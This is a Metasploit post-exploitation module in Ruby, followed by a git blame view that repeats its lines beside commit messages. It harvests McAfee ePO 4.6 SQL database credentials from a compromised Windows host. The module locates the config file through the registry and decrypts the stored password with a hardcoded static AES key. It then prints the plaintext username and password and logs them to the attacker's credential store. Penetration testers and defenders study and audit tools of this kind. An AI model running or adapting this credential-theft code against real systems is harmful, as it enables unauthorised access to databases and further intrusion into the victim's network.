metasploit-framework/modules/post/windows/gather/credentials/epo_sql.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'
require 'net/dns/resolver'
require 'msf/core/auxiliary/report'

class Metasploit3 < Msf::Post

  include Msf::Post::Windows::Registry
  include Msf::Auxiliary::Report

  def initialize(info={})
    super( update_info( info,
      'Name'          => 'Windows Gather McAfee ePO 4.6 Config SQL Credentials',
      'Description'   => %q{
        This module extracts connection details and decrypts the saved password for the
        SQL database in use by a McAfee ePO 4.6 server. The passwords are stored in a
        config file. They are encrypted with AES-128-ECB and a static key.
      },
      'License'       => MSF_LICENSE,
      'Author'        => ['Nathan Einwechter <neinwechter[at]gmail.com>'],
      'Platform'      => [ 'win' ],
      'SessionTypes'  => [ 'meterpreter' ]
    ))
  end

  def run
    # Find out where things are installed
    print_status('Finding Tomcat install path...')
    subkeys = registry_enumkeys('HKLM\Software\Network Associates\ePolicy Orchestrator',REGISTRY_VIEW_32_BIT)
    if subkeys.nil? or subkeys.empty?
      print_error ('ePO 4.6 Not Installed or No Permissions to RegKey')
      return
    end
    # Get the db.properties file location
    epol_reg_key = 'HKLM\Software\Network Associates\ePolicy Orchestrator'
    dbprops_file = registry_getvaldata(epol_reg_key, 'TomcatFolder',REGISTRY_VIEW_32_BIT)
    if dbprops_file == nil or dbprops_file == ''
      print_error('Could not find db.properties file location')
    else
      dbprops_file << '/conf/orion/db.properties';
      print_good('Found db.properties location');
      process_config(dbprops_file);
    end
  end

  def process_config(filename)
    config = client.fs.file.new(filename, 'r')
    print_status("Processing #{filename}")
    contents = config.read
    config_lines = contents.split("\n")
    for line in config_lines
      line.chomp
      line_array = line.split('=')
      case line_array[0]
      when 'db.database.name'
        database_name = ''
        line_array[1].each_byte { |x|  database_name << x unless x > 126 || x < 32 }
      when 'db.instance.name'
        database_instance = ''
        line_array[1].each_byte { |x|  database_instance << x unless x > 126 || x < 32 }
      when 'db.user.domain'
        user_domain = ''
        line_array[1].each_byte { |x|  user_domain << x unless x > 126 || x < 32 }
      when 'db.user.name'
        user_name = ''
        line_array[1].each_byte { |x|  user_name << x unless x > 126 || x < 32 }
      when 'db.port'
        port = ''
        line_array[1].each_byte { |x|  port << x unless x > 126 || x < 32 }
      when 'db.user.passwd.encrypted.ex'
        # ePO 4.6 encrypted password
        passwd = ''
        line_array[1].each_byte { |x|  passwd << x unless x > 126 || x < 32 }
        passwd.gsub('\\','')
        # Add any Base64 padding that may have been stripped out
        passwd << '=' until ( passwd.length % 4 == 0 )
        plaintext_passwd = decrypt46(passwd)
      when 'db.user.passwd.encrypted'
        # ePO 4.5 encrypted password - not currently supported, see notes below
        passwd = ''
        line_array[1].each_byte { |x|  passwd << x unless x > 126 || x < 32 }
        passwd.gsub('\\','')
        # Add any Base64 padding that may have been stripped out
        passwd << '=' until ( passwd.length % 4 == 0 )
        plaintext_passwd = 'PASSWORD NOT RECOVERED - ePO 4.5 DECRYPT SUPPORT IS WIP'
      when 'db.server.name'
        database_server_name = ''
        line_array[1].each_byte { |x|  database_server_name << x unless x > 126 || x < 32 }
      end
    end

    # resolve IP address for creds reporting

    result = client.net.resolve.resolve_host(database_server_name)
    if result[:ip].nil? or  result[:ip].empty?
      print_error('Could not determine IP of DB - credentials not added to report database')
      return
    end

    db_ip = result[:ip]

    print_good("SQL Server: #{database_server_name}")
    print_good("SQL Instance: #{database_instance}")
    print_good("Database Name: #{database_name}")
    if db_ip
      print_good("Database IP: #{db_ip}")
    end
    print_good("Port: #{port}")
    if user_domain == nil or user_domain == ''
      print_good('Authentication Type: SQL');
      full_user = user_name
    else
      print_good('Authentication Type: Domain');
      print_good("Domain: #{user_domain}");
      full_user = "#{user_domain}\\#{user_name}"
    end
    print_good("User: #{full_user}")
    print_good("Password: #{plaintext_passwd}")

    if (db_ip)
      # submit to reports
      service_data = {
        address: Rex::Socket.getaddress(db_ip),
        port: port,
        protocol: 'tcp',
        service_name: 'mssql',
        workspace_id: myworkspace_id
      }

      credential_data = {
        origin_type: :session,
        session_id: session_db_id,
        post_reference_name: self.refname,
        username: full_user,
        private_data: plaintext_passwd,
        private_type: :password
      }

      credential_core = create_credential(credential_data.merge(service_data))

      login_data = {
        core: credential_core,
        access_level: 'User',
        status: Metasploit::Model::Login::Status::UNTRIED
      }

      create_credential_login(login_data.merge(service_data))
      print_good('Added credentials to report database')
    else
      print_error('Could not determine IP of DB - credentials not added to report database')
    end
  end


  def decrypt46(encoded)
    encrypted_data = Rex::Text.decode_base64(encoded)
    aes = OpenSSL::Cipher::Cipher.new('AES-128-ECB')
    aes.padding = 0
    aes.decrypt
    # Private key extracted from ePO 4.6.0 Build 1029
    # If other keys are required for other versions of 4.6 - will have to add version
    # identification routines in to the main part of the module
    key = [ 94, -100, 62, -33, -26, 37, -124, 54, 102, 33, -109, -128, 49, 90, 41, 51 ]
    aes.key = key.pack('C*')
    password = aes.update(encrypted_data) + aes.final
    # Get rid of all the crazy \f's that result
    password.gsub!(/[^[:print:]]/,'')
    return password
  end
end
Adds the community submitted ePO database password post module Did some minor code cleanup and replaced the hostname resolution with mubix's railgun code to make the victim do the resolution. This should be more reliable. Fixes #5210 git-svn-id: file:///home/svn/framework3/trunk@14160 4d416f70-5f16-0410-b530-b9f4589650da 2011-11-04 20:15:14 +00:00			`##`
Fix up comment splats with the correct URI See the complaint on #4039. This doesn't fix that particular issue (it's somewhat unrelated), but does solve around a file parsing problem reported by @void-in 2014-10-17 16:47:33 +00:00			`# This module requires Metasploit: http://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adds the community submitted ePO database password post module Did some minor code cleanup and replaced the hostname resolution with mubix's railgun code to make the victim do the resolution. This should be more reliable. Fixes #5210 git-svn-id: file:///home/svn/framework3/trunk@14160 4d416f70-5f16-0410-b530-b9f4589650da 2011-11-04 20:15:14 +00:00			`##`
indent level fix git-svn-id: file:///home/svn/framework3/trunk@14162 4d416f70-5f16-0410-b530-b9f4589650da 2011-11-04 21:04:54 +00:00
Adds the community submitted ePO database password post module Did some minor code cleanup and replaced the hostname resolution with mubix's railgun code to make the victim do the resolution. This should be more reliable. Fixes #5210 git-svn-id: file:///home/svn/framework3/trunk@14160 4d416f70-5f16-0410-b530-b9f4589650da 2011-11-04 20:15:14 +00:00			`require 'msf/core'`
			`require 'rex'`
fix quotes 2015-05-18 10:20:42 +00:00			`require 'net/dns/resolver'`
Require's for all the include's 2012-10-23 18:24:05 +00:00			`require 'msf/core/auxiliary/report'`
Adds the community submitted ePO database password post module Did some minor code cleanup and replaced the hostname resolution with mubix's railgun code to make the victim do the resolution. This should be more reliable. Fixes #5210 git-svn-id: file:///home/svn/framework3/trunk@14160 4d416f70-5f16-0410-b530-b9f4589650da 2011-11-04 20:15:14 +00:00
			`class Metasploit3 < Msf::Post`
indent level fix git-svn-id: file:///home/svn/framework3/trunk@14162 4d416f70-5f16-0410-b530-b9f4589650da 2011-11-04 21:04:54 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Post::Windows::Registry`
			`include Msf::Auxiliary::Report`
Adds the community submitted ePO database password post module Did some minor code cleanup and replaced the hostname resolution with mubix's railgun code to make the victim do the resolution. This should be more reliable. Fixes #5210 git-svn-id: file:///home/svn/framework3/trunk@14160 4d416f70-5f16-0410-b530-b9f4589650da 2011-11-04 20:15:14 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def initialize(info={})`
			`super( update_info( info,`
			`'Name' => 'Windows Gather McAfee ePO 4.6 Config SQL Credentials',`
			`'Description' => %q{`
			`This module extracts connection details and decrypts the saved password for the`
			`SQL database in use by a McAfee ePO 4.6 server. The passwords are stored in a`
			`config file. They are encrypted with AES-128-ECB and a static key.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => ['Nathan Einwechter <neinwechter[at]gmail.com>'],`
			`'Platform' => [ 'win' ],`
			`'SessionTypes' => [ 'meterpreter' ]`
			`))`
			`end`
Adds the community submitted ePO database password post module Did some minor code cleanup and replaced the hostname resolution with mubix's railgun code to make the victim do the resolution. This should be more reliable. Fixes #5210 git-svn-id: file:///home/svn/framework3/trunk@14160 4d416f70-5f16-0410-b530-b9f4589650da 2011-11-04 20:15:14 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def run`
			`# Find out where things are installed`
fix quotes 2015-05-18 10:20:42 +00:00			`print_status('Finding Tomcat install path...')`
single quotes and slashes.. 2015-05-18 14:33:57 +00:00			`subkeys = registry_enumkeys('HKLM\Software\Network Associates\ePolicy Orchestrator',REGISTRY_VIEW_32_BIT)`
use REGISTRY_VIEW_32_BIT 2015-05-18 08:19:32 +00:00			`if subkeys.nil? or subkeys.empty?`
fix quotes 2015-05-18 10:20:42 +00:00			`print_error ('ePO 4.6 Not Installed or No Permissions to RegKey')`
Retab modules 2013-08-30 21:28:54 +00:00			`return`
			`end`
			`# Get the db.properties file location`
single quotes and slashes.. 2015-05-18 14:33:57 +00:00			`epol_reg_key = 'HKLM\Software\Network Associates\ePolicy Orchestrator'`
fix quotes 2015-05-18 10:20:42 +00:00			`dbprops_file = registry_getvaldata(epol_reg_key, 'TomcatFolder',REGISTRY_VIEW_32_BIT)`
			`if dbprops_file == nil or dbprops_file == ''`
			`print_error('Could not find db.properties file location')`
use REGISTRY_VIEW_32_BIT 2015-05-18 08:19:32 +00:00			`else`
fix quotes 2015-05-18 10:20:42 +00:00			`dbprops_file << '/conf/orion/db.properties';`
			`print_good('Found db.properties location');`
use REGISTRY_VIEW_32_BIT 2015-05-18 08:19:32 +00:00			`process_config(dbprops_file);`
Retab modules 2013-08-30 21:28:54 +00:00			`end`
			`end`
Adds the community submitted ePO database password post module Did some minor code cleanup and replaced the hostname resolution with mubix's railgun code to make the victim do the resolution. This should be more reliable. Fixes #5210 git-svn-id: file:///home/svn/framework3/trunk@14160 4d416f70-5f16-0410-b530-b9f4589650da 2011-11-04 20:15:14 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def process_config(filename)`
			`config = client.fs.file.new(filename, 'r')`
			`print_status("Processing #{filename}")`
			`contents = config.read`
			`config_lines = contents.split("\n")`
			`for line in config_lines`
			`line.chomp`
			`line_array = line.split('=')`
			`case line_array[0]`
fix quotes 2015-05-18 10:20:42 +00:00			`when 'db.database.name'`
			`database_name = ''`
Retab modules 2013-08-30 21:28:54 +00:00			`line_array[1].each_byte { \|x\| database_name << x unless x > 126 \|\| x < 32 }`
fix quotes 2015-05-18 10:20:42 +00:00			`when 'db.instance.name'`
			`database_instance = ''`
Retab modules 2013-08-30 21:28:54 +00:00			`line_array[1].each_byte { \|x\| database_instance << x unless x > 126 \|\| x < 32 }`
fix quotes 2015-05-18 10:20:42 +00:00			`when 'db.user.domain'`
			`user_domain = ''`
Retab modules 2013-08-30 21:28:54 +00:00			`line_array[1].each_byte { \|x\| user_domain << x unless x > 126 \|\| x < 32 }`
fix quotes 2015-05-18 10:20:42 +00:00			`when 'db.user.name'`
			`user_name = ''`
Retab modules 2013-08-30 21:28:54 +00:00			`line_array[1].each_byte { \|x\| user_name << x unless x > 126 \|\| x < 32 }`
fix quotes 2015-05-18 10:20:42 +00:00			`when 'db.port'`
			`port = ''`
Retab modules 2013-08-30 21:28:54 +00:00			`line_array[1].each_byte { \|x\| port << x unless x > 126 \|\| x < 32 }`
fix quotes 2015-05-18 10:20:42 +00:00			`when 'db.user.passwd.encrypted.ex'`
Retab modules 2013-08-30 21:28:54 +00:00			`# ePO 4.6 encrypted password`
fix quotes 2015-05-18 10:20:42 +00:00			`passwd = ''`
Retab modules 2013-08-30 21:28:54 +00:00			`line_array[1].each_byte { \|x\| passwd << x unless x > 126 \|\| x < 32 }`
fix quotes 2015-05-18 10:20:42 +00:00			`passwd.gsub('\\','')`
Retab modules 2013-08-30 21:28:54 +00:00			`# Add any Base64 padding that may have been stripped out`
fix quotes 2015-05-18 10:20:42 +00:00			`passwd << '=' until ( passwd.length % 4 == 0 )`
Retab modules 2013-08-30 21:28:54 +00:00			`plaintext_passwd = decrypt46(passwd)`
fix quotes 2015-05-18 10:20:42 +00:00			`when 'db.user.passwd.encrypted'`
Retab modules 2013-08-30 21:28:54 +00:00			`# ePO 4.5 encrypted password - not currently supported, see notes below`
fix quotes 2015-05-18 10:20:42 +00:00			`passwd = ''`
Retab modules 2013-08-30 21:28:54 +00:00			`line_array[1].each_byte { \|x\| passwd << x unless x > 126 \|\| x < 32 }`
fix quotes 2015-05-18 10:20:42 +00:00			`passwd.gsub('\\','')`
Retab modules 2013-08-30 21:28:54 +00:00			`# Add any Base64 padding that may have been stripped out`
fix quotes 2015-05-18 10:20:42 +00:00			`passwd << '=' until ( passwd.length % 4 == 0 )`
			`plaintext_passwd = 'PASSWORD NOT RECOVERED - ePO 4.5 DECRYPT SUPPORT IS WIP'`
			`when 'db.server.name'`
			`database_server_name = ''`
Retab modules 2013-08-30 21:28:54 +00:00			`line_array[1].each_byte { \|x\| database_server_name << x unless x > 126 \|\| x < 32 }`
			`end`
			`end`
Adds the community submitted ePO database password post module Did some minor code cleanup and replaced the hostname resolution with mubix's railgun code to make the victim do the resolution. This should be more reliable. Fixes #5210 git-svn-id: file:///home/svn/framework3/trunk@14160 4d416f70-5f16-0410-b530-b9f4589650da 2011-11-04 20:15:14 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`# resolve IP address for creds reporting`
Adds the community submitted ePO database password post module Did some minor code cleanup and replaced the hostname resolution with mubix's railgun code to make the victim do the resolution. This should be more reliable. Fixes #5210 git-svn-id: file:///home/svn/framework3/trunk@14160 4d416f70-5f16-0410-b530-b9f4589650da 2011-11-04 20:15:14 +00:00
Use meterpreter dns resolve 2013-09-24 20:58:04 +00:00			`result = client.net.resolve.resolve_host(database_server_name)`
			`if result[:ip].nil? or result[:ip].empty?`
fix quotes 2015-05-18 10:20:42 +00:00			`print_error('Could not determine IP of DB - credentials not added to report database')`
Retab modules 2013-08-30 21:28:54 +00:00			`return`
			`end`
Use meterpreter dns resolve 2013-09-24 20:58:04 +00:00
			`db_ip = result[:ip]`
Adds the community submitted ePO database password post module Did some minor code cleanup and replaced the hostname resolution with mubix's railgun code to make the victim do the resolution. This should be more reliable. Fixes #5210 git-svn-id: file:///home/svn/framework3/trunk@14160 4d416f70-5f16-0410-b530-b9f4589650da 2011-11-04 20:15:14 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`print_good("SQL Server: #{database_server_name}")`
			`print_good("SQL Instance: #{database_instance}")`
			`print_good("Database Name: #{database_name}")`
			`if db_ip`
			`print_good("Database IP: #{db_ip}")`
			`end`
			`print_good("Port: #{port}")`
fix quotes 2015-05-18 10:20:42 +00:00			`if user_domain == nil or user_domain == ''`
			`print_good('Authentication Type: SQL');`
Retab modules 2013-08-30 21:28:54 +00:00			`full_user = user_name`
			`else`
fix quotes 2015-05-18 10:20:42 +00:00			`print_good('Authentication Type: Domain');`
Retab modules 2013-08-30 21:28:54 +00:00			`print_good("Domain: #{user_domain}");`
			`full_user = "#{user_domain}\\#{user_name}"`
			`end`
			`print_good("User: #{full_user}")`
			`print_good("Password: #{plaintext_passwd}")`
Adds the community submitted ePO database password post module Did some minor code cleanup and replaced the hostname resolution with mubix's railgun code to make the victim do the resolution. This should be more reliable. Fixes #5210 git-svn-id: file:///home/svn/framework3/trunk@14160 4d416f70-5f16-0410-b530-b9f4589650da 2011-11-04 20:15:14 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`if (db_ip)`
			`# submit to reports`
Refactor epo_sql creds 2014-06-12 18:23:11 +00:00			`service_data = {`
			`address: Rex::Socket.getaddress(db_ip),`
			`port: port,`
fix quotes 2015-05-18 10:20:42 +00:00			`protocol: 'tcp',`
			`service_name: 'mssql',`
Refactor epo_sql creds 2014-06-12 18:23:11 +00:00			`workspace_id: myworkspace_id`
			`}`

			`credential_data = {`
			`origin_type: :session,`
			`session_id: session_db_id,`
			`post_reference_name: self.refname,`
			`username: full_user,`
			`private_data: plaintext_passwd,`
			`private_type: :password`
			`}`

			`credential_core = create_credential(credential_data.merge(service_data))`

			`login_data = {`
			`core: credential_core,`
fix quotes 2015-05-18 10:20:42 +00:00			`access_level: 'User',`
Resolves some Login::Status migration issues MSP-10730 2014-07-17 02:52:08 +00:00			`status: Metasploit::Model::Login::Status::UNTRIED`
Refactor epo_sql creds 2014-06-12 18:23:11 +00:00			`}`

			`create_credential_login(login_data.merge(service_data))`
fix quotes 2015-05-18 10:20:42 +00:00			`print_good('Added credentials to report database')`
Retab modules 2013-08-30 21:28:54 +00:00			`else`
fix quotes 2015-05-18 10:20:42 +00:00			`print_error('Could not determine IP of DB - credentials not added to report database')`
Retab modules 2013-08-30 21:28:54 +00:00			`end`
			`end`
Adds the community submitted ePO database password post module Did some minor code cleanup and replaced the hostname resolution with mubix's railgun code to make the victim do the resolution. This should be more reliable. Fixes #5210 git-svn-id: file:///home/svn/framework3/trunk@14160 4d416f70-5f16-0410-b530-b9f4589650da 2011-11-04 20:15:14 +00:00

Retab modules 2013-08-30 21:28:54 +00:00			`def decrypt46(encoded)`
			`encrypted_data = Rex::Text.decode_base64(encoded)`
fix quotes 2015-05-18 10:20:42 +00:00			`aes = OpenSSL::Cipher::Cipher.new('AES-128-ECB')`
Retab modules 2013-08-30 21:28:54 +00:00			`aes.padding = 0`
			`aes.decrypt`
			`# Private key extracted from ePO 4.6.0 Build 1029`
			`# If other keys are required for other versions of 4.6 - will have to add version`
			`# identification routines in to the main part of the module`
			`key = [ 94, -100, 62, -33, -26, 37, -124, 54, 102, 33, -109, -128, 49, 90, 41, 51 ]`
			`aes.key = key.pack('C*')`
			`password = aes.update(encrypted_data) + aes.final`
			`# Get rid of all the crazy \f's that result`
			`password.gsub!(/[^[:print:]]/,'')`
			`return password`
			`end`
fix EOL character 2015-05-18 20:46:55 +00:00			`end`
Adds the community submitted ePO database password post module Did some minor code cleanup and replaced the hostname resolution with mubix's railgun code to make the victim do the resolution. This should be more reliable. Fixes #5210 git-svn-id: file:///home/svn/framework3/trunk@14160 4d416f70-5f16-0410-b530-b9f4589650da 2011-11-04 20:15:14 +00:00